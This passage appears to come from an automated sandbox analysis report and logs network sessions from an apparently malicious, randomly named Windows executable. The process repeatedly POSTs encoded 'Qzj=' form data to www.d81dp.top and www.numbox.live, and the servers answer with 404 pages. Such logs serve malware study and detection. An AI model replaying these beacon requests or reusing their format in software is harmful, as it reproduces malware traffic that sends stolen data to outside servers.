                                                                                                                    Data Raw: 51 7a 6a 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 74 71 35 2b 4c 5a 43 4f 58 74 35 30 38 56 69 54 44 34 41 6e 36 50 72 48 6a 43 33 53 58 53 48 71 51 37 5a 4f 6c 57 4e 30 35 39 58 38 6e 39 30 68 35 59 68 6c 5a 43 54 4e 32 77 54 74 44 4a 61 71 76 34 72 37 42 79 77 4f 4c 5a 69 53 6e 34 63 65 6f 31 33 4b 4e 79 31 75 43 44 61 54 78 44 57 4c 36 7a 66 67 47 6c 77 4d 74 31 31 35 67 73 65 35 51 68 75 57 53 41 2f 59 4a 51 4f 4c 39 30 44 34 67 6d 58 64 6b 64 41 4d 55 7a 65 6b 6a 6d 6c 57 4f 6d 41 71 54 6b 46 77 71 42 67 34 48 79 68 53 36 62 74 51 69 77 35 64 61 30 49 50 76 44 44 74 78 76 70 63 35 77 3d 3d
                                                                                                                    Data Ascii: Qzj=VRsHMh2u/t3etq5+LZCOXt508ViTD4An6PrHjC3SXSHqQ7ZOlWN059X8n90h5YhlZCTN2wTtDJaqv4r7BywOLZiSn4ceo13KNy1uCDaTxDWL6zfgGlwMt115gse5QhuWSA/YJQOL90D4gmXdkdAMUzekjmlWOmAqTkFwqBg4HyhS6btQiw5da0IPvDDtxvpc5w==
                                                                                                                    Oct 24, 2024 05:08:45.055300951 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.450028154.23.184.194805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:46.743406057 CEST806OUTPOST /9m01/ HTTP/1.1
                                                                                                                    Host: www.d81dp.top
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.d81dp.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.d81dp.top/9m01/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 76 71 58 61 70 4f 30 6e 4e 30 31 64 58 38 6f 64 30 67 30 34 68 2b 5a 43 66 7a 32 31 37 74 44 4a 4f 71 76 34 62 37 42 6c 4d 4a 4e 5a 69 71 38 6f 63 63 31 6c 33 4b 4e 79 31 75 43 44 66 4f 78 48 43 4c 39 41 48 67 45 45 77 4c 32 56 31 2b 6a 73 65 35 44 78 75 4b 53 41 2b 6f 4a 53 71 6c 39 33 37 34 67 6b 66 64 6b 73 41 4c 64 7a 65 6d 73 47 6b 37 4e 56 39 61 4a 47 49 49 31 6e 4d 4d 59 52 35 69 32 39 38 4b 7a 42 59 4b 49 30 73 38 79 45 4b 5a 38 73 55 56 69 31 37 69 68 43 4d 73 46 33 67 44 6a 4e 65 5a 58 70 51 35 75 35 49 3d
                                                                                                                    Data Ascii: Qzj=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXkvqXapO0nN01dX8od0g04h+ZCfz217tDJOqv4b7BlMJNZiq8occ1l3KNy1uCDfOxHCL9AHgEEwL2V1+jse5DxuKSA+oJSql9374gkfdksALdzemsGk7NV9aJGII1nMMYR5i298KzBYKI0s8yEKZ8sUVi17ihCMsF3gDjNeZXpQ5u5I=
                                                                                                                    Oct 24, 2024 05:08:47.690577984 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:47 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.450029154.23.184.194805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:49.291754007 CEST10888OUTPOST /9m01/ HTTP/1.1
                                                                                                                    Host: www.d81dp.top
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.d81dp.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.d81dp.top/9m01/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 6e 71 58 6f 68 4f 6d 31 6c 30 30 64 58 38 6c 39 30 6c 30 34 67 6b 5a 43 47 30 32 31 2f 58 44 4b 32 71 70 72 54 37 56 45 4d 4a 59 70 69 71 6a 34 63 64 6f 31 32 51 4e 79 46 71 43 44 50 4f 78 48 43 4c 39 47 44 67 44 56 77 4c 78 6c 31 35 67 73 65 6c 51 68 75 75 53 41 6e 51 4a 53 2b 62 36 48 62 34 67 45 50 64 33 36 55 4c 46 6a 65 67 70 47 6b 6a 4e 56 78 46 4a 47 6c 78 31 6a 4e 5a 59 58 46 69 6e 36 4a 49 75 56 4e 53 5a 6c 30 42 78 6b 4b 34 38 4d 38 77 37 6d 50 6a 68 53 35 30 65 44 6b 54 35 76 54 4e 41 4b 49 4a 7a 50 2f 51 6b 6a 39 46 48 30 47 4d 61 63 73 37 51 66 61 5a 63 5a 78 5a 4d 66 39 73 6d 73 67 55 61 2b 47 49 7a 4b 45 4b 69 61 32 30 4f 4f 58 56 6c 42 6b 64 55 6f 56 6f 35 66 69 73 4e 54 66 33 33 4e 38 73 72 4a 43 46 39 32 48 41 43 72 75 67 58 5a 65 59 6d 7a 59 67 59 45 45 43 67 55 54 41 35 30 43 51 53 7a 55 33 6c 69 49 6a 35 34 42 47 4f 7a 34 6f 71 35 50 44 4e 6a [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXknqXohOm1l00dX8l90l04gkZCG021/XDK2qprT7VEMJYpiqj4cdo12QNyFqCDPOxHCL9GDgDVwLxl15gselQhuuSAnQJS+b6Hb4gEPd36ULFjegpGkjNVxFJGlx1jNZYXFin6JIuVNSZl0BxkK48M8w7mPjhS50eDkT5vTNAKIJzP/Qkj9FH0GMacs7QfaZcZxZMf9smsgUa+GIzKEKia20OOXVlBkdUoVo5fisNTf33N8srJCF92HACrugXZeYmzYgYEECgUTA50CQSzU3liIj54BGOz4oq5PDNjZ599Jgx9DLJN3gIjghiom/1ROY5R5TxtBXkhgLzai970/RjnzXvBuYbKtI/QMk3Jj3MNH6KaYZ5nFcCutLHquCHKgVVtWeF41VCiJCgtTxhoQdOSTLbneIpJqbwllIn7X6SNcrfojkdvrzCU3PbU296npXduOnvbo4egNMcGjbu2VHoOM8/M/pQZSQe6sWpARsxylQT53q8LPcG/XOXjcFcbIGeXH8BffVvPfbi8yJhAzZVATlvWTcMvRaRREfNLBiC0xKIiRK9ENxBsdMQQ3uIU7aZm3HSHmajNVEcAUTU8goHtZ/cEp8+WGu5eTaFXnSAh1CgmTINtnCDLHLx475cq+Gxo9fX8k7stxVXkI6fDi1sxR2cyRht7+UlcwP4jOBrT+AvQNTqOlsPfeQqZBDvnlHuc19JzxLUh1DgixeOsIC/Ou1wCG5WOd8sVVyAwbYiwPo2twgUVt+o+5/+pvYDPGpfYuil1+yjkGnucAUgDTRwSDnSO/FwgdVV8OI3pRpzz4QUJFAiyaKRdZH4aZA1X8utiinI4yqPONsSZkExK+ThI20RLOC/1C43MgpDhK6YyWtgYg+VnnInPYVKfX5vsyGAjQiHl7aBwTNVKmPnEV0n0IArgIwjzdaB2S2lgC7lrUTMPiZT1hQCH9skmjXCZuiRDLiwIy5 [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:08:50.243462086 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.450030154.23.184.194805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:51.837604046 CEST528OUTGET /9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.d81dp.top
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:08:52.786062002 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:52 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.45003163.250.47.57805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:58.076162100 CEST792OUTPOST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 33 79 50 55 55 6e 49 53 34 58 69 69 49 7a 69 45 49 4a 4b 78 52 61 49 6b 7a 38 62 69 79 38 4a 33 36 48 5a 63 2b 30 46 6e 73 33 43 69 46 68 67 74 78 6b 66 6a 4a 75 51 52 6e 64 73 66 61 4e 6c 51 65 44 6d 6a 31 6e 4d 4c 74 37 79 67 71 6b 52 56 48 41 51 67 71 75 79 66 4e 47 73 7a 5a 5a 77 4b 4b 79 65 76 52 71 2f 38 78 6d 34 38 2b 45 79 54 38 34 56 47 56 4b 35 73 2f 30 59 62 4f 37 38 4c 32 6b 43 55 62 58 34 74 61 71 43 2b 5a 78 7a 6e 37 6b 52 4b 6d 6e 33 63 70 4b 33 52 6b 65 62 47 30 75 45 51 38 76 51 6d 66 54 61 53 66 72 49 52 71 69 2b 54 33 77 3d 3d
                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr3yPUUnIS4XiiIziEIJKxRaIkz8biy8J36HZc+0Fns3CiFhgtxkfjJuQRndsfaNlQeDmj1nMLt7ygqkRVHAQgquyfNGszZZwKKyevRq/8xm48+EyT84VGVK5s/0YbO78L2kCUbX4taqC+Zxzn7kRKmn3cpK3RkebG0uEQ8vQmfTaSfrIRqi+T3w==
                                                                                                                    Oct 24, 2024 05:08:58.751224041 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:58 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:08:58.751310110 CEST1236INData Raw: 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f
                                                                                                                    Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="
                                                                                                                    Oct 24, 2024 05:08:58.751399040 CEST1236INData Raw: 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 70 72 6f 63 65 73 73 2e 68 74 6d 6c 22 3e 50 72 6f 63 65 73 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d
                                                                                                                    Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03
                                                                                                                    Oct 24, 2024 05:08:58.751456976 CEST832INData Raw: 2e 76 61 6c 75 65 3d 3d 27 27 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 6f 6e 46 6f 63 75 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 20 3d 3d 27 27 20 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: .value=='') this.value=''" onFocus="if(this.value =='' ) this.value=''" > <a href="#" class="btn btn-1 ">Search</a> </div> </form> </div> </div> </div> </div> </div


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.45003263.250.47.57805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:00.623117924 CEST812OUTPOST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 74 33 36 6a 64 63 2f 32 74 6e 69 58 43 69 4b 42 67 6f 38 45 66 6f 4a 75 4d 5a 6e 59 55 66 61 4c 4a 51 65 44 32 6a 31 55 6b 4b 73 72 79 69 6d 45 52 58 44 41 51 67 71 75 79 66 4e 47 34 56 5a 59 59 4b 4b 48 57 76 41 37 2f 6a 79 6d 34 2f 75 6b 79 54 34 34 56 43 56 4b 35 65 2f 77 5a 4d 4f 34 55 4c 32 68 47 55 62 46 41 69 52 71 43 38 64 78 79 4a 2f 52 6b 6f 70 69 57 64 32 63 7a 66 37 2b 54 2b 38 49 56 4b 74 65 78 78 4e 54 2b 68 43 73 42 6c 6e 68 44 61 73 34 58 46 4c 32 62 54 6d 48 2b 38 63 65 68 67 78 63 54 74 46 62 51 3d
                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyut36jdc/2tniXCiKBgo8EfoJuMZnYUfaLJQeD2j1UkKsryimERXDAQgquyfNG4VZYYKKHWvA7/jym4/ukyT44VCVK5e/wZMO4UL2hGUbFAiRqC8dxyJ/RkopiWd2czf7+T+8IVKtexxNT+hCsBlnhDas4XFL2bTmH+8cehgxcTtFbQ=
                                                                                                                    Oct 24, 2024 05:09:01.314924002 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:01 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:01.315006018 CEST212INData Raw: 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f
                                                                                                                    Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/
                                                                                                                    Oct 24, 2024 05:09:01.315061092 CEST1236INData Raw: 69 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63
                                                                                                                    Data Ascii: ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'><link href='http://fonts.googleapis.com/css?family=Open+Sans:400' rel='stylesheet' type='text/css'>
                                                                                                                    Oct 24, 2024 05:09:01.315116882 CEST1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 33 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Contact</a></li> </ul> </div> </div> </div> </div>
